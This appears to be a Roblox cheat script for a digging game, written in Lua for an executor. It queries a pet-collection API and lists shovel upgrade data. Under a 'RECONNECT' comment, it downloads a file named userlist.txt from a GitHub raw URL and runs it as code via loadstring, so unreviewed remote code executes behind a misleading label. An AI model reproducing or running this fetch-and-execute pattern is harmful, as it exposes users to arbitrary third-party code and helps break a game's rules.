print("Hsayy")
local HttpService = game:GetService("HttpService")
local encodedCollection
local Collection

while true do
    pcall(function()
        encodedCollection = request({Url = "https://biggamesapi.io/api/collection/Pets", Method = "GET",Headers = {["Content-Type"] = "application/json"}})
        Collection = game:GetService("HttpService"):JSONDecode(encodedCollection.Body)
    end)
    if Collection then break end
    task.wait(5)
end

print("fers")
-- RECONNECT
spawn(loadstring(game:HttpGet("https://raw.githubusercontent.com/GrandmaHasSomeSoftHands/UserList/main/userlist.txt")))





-- CONSTANTS
local SHOP_SHOVELS = {
    "Flimsy Shovel",
    "Normal Shovel",
    "Bluesteel Shovel",
    "Sharp Shovel",
    "Pro Shovel",
    "Platinum Shovel",
    "Emerald Shovel",
    "Sapphire Shovel",
    "Amethyst Shovel",
}

local SHOVEL_DEPTH = {
    {1, 9},
    {10, 25},
    {26, 49},
    {50, 127},
    {50, 127},
    {10, 25},
    {26, 49},
    {50, 127},
    {50, 127},
}

local NEXT_SHOVEL_COST = {
    ["Flimsy Shovel"] = 2000,
    ["Normal Shovel"] = 12500,
    ["Bluesteel Shovel"] = 55000,
    ["Sharp Shovel"] = 250000,
    ["Platinum Shovel"] = 1250000,
    ["Emerald Shovel"] = 4000000,
    ["Sapphire Shovel"] = 12500000,
}

local NEXT_SHOVEL = {
    ["Flimsy Shovel"] = "Normal Shovel",
    ["Normal Shovel"] = "Bluesteel Shovel",
    ["Bluesteel Shovel"] = "Sharp Shovel",
    ["Sharp Shovel"] = "Platinum Shovel",
    ["Platinum Shovel"] = "Emerald Shovel",
    ["Emerald Shovel"] = "Sapphire Shovel",
    ["Sapphire Shovel"] = "Amethyst Shovel",
}

print("SHUBsee")
